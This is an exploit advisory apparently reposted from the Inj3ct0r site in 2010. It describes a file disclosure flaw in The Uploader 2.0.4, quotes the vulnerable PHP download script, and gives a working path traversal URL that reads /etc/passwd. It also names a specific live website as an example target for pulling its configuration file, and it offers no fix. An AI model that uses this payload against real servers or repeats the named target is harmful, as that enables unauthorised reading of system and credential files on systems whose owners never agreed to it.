The Uploader 2.0.4 Remote File disclosure Vulnerability
Posted on 22 June 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>The Uploader 2.0.4 Remote File disclosure Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>======================================================= The Uploader 2.0.4 Remote File disclosure Vulnerability ======================================================= # Script Name : The Uploader # Version: [2.0.4] # Language : php # Author : Xa7m3d (H4K@hotmail.ch) # Download : http://sourceforge.net/projects/theuploader # Tested on : ubuntu 9.10 ============================================== File Disclosure : in : api/download_launch.php ####################################### $open=fopen($main['upload_directory'] . $_GET['filename'], "r"); <??(+) $size=filesize($main['upload_directory'] . $_GET['filename']); $read=fread($open, $size); header("Content-Type: application/octet-stream"); header("Content-Length: " . $size); header("Content-Transfer-Encoding: binary"); header("Content-Disposition: attachment; filename=" . $_GET['filename']); <??(+) ####################################### 3XP : api/download_launch.php?filename=../../../../../etc/passwd Example : http://www.busut.it/theuploader/api/download_launch.php?filename=../config.inc.php T3AM Piracy Unlimited Tunisia : # Cyb3R H3LL # k[i]ng # La Haft Xroy # # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-22]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>